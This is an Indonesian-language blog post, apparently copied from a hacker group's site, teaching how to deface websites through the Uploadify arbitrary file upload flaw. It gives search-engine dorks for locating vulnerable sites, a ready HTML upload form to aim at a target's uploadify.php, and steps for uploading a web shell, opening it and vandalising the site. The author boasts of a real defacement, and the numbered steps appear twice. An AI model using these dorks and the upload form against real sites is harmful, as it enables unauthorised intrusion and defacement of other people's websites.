Deface Uploadify Arbitrary File Upload (New Dork)
Ini memang metode deface lama, tapi masih banyak kok yang pakai teknik ini :). Simak aja Tutorialnya
Bahan-Bahan :
- PC/Laptop
- Koneksi Internet
- CSRF
- Dork
- Shell (kalo blm punya cari di gugel)
inurl:/uploadify/ intitle:index of (bisa di kembangkan lagi)
New Dork :
Setelah lama ane jarang depes.. Kemaren ane coba POC uploadify. Ternyata masih banyak yg bisa di jebol Dork :
Intitle:"UploadiFive Test" [exploit /diruploadify/uploadify.php] intitle:index of intext:uploadify.php
inurl:/jquery.uploadify-v2
inurl:/library/uploadify
inurl:/upload/uploadify.php CSRF Vulnerable..
Postname: Filedata
Vuln : blank..
CSRF :
<form method="post" action="urltarget">enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="Filedata" ><br><input type="submit" name="submit" value="Tusbol"></form>
Atau CSRF online di www.icc-akatsu.ml/p/
2. Dorking
3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)
4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)
5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)
6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php
7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php
8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya
Lihat hasil deface saya di sini : https://defacer.id/104636.html
Saya cuma bisa kasih liat mirror karna sekarang web nya sudah sembuh
Mohon maaf bila ada kekurangan/kesalahan, maklumi lah saya hanya newbie yang fakir ilmu
Tutorial :
1. Copy CSRF di atas lalu save dengan format .html2. Dorking
3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)
4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)
5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)
6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php
7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php
8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya
Lihat hasil deface saya di sini : https://defacer.id/104636.html
Saya cuma bisa kasih liat mirror karna sekarang web nya sudah sembuh
Mohon maaf bila ada kekurangan/kesalahan, maklumi lah saya hanya newbie yang fakir ilmu
Click Here!
Sumber : http://blog.garudasecurityhacker.org
Share This :
comment 2 komentar
more_vertnice for info, SIBAKUA
21 November 2017 pukul 01.27Kosngosan
UKMSUMUT
Mobil Honda Pekanbaru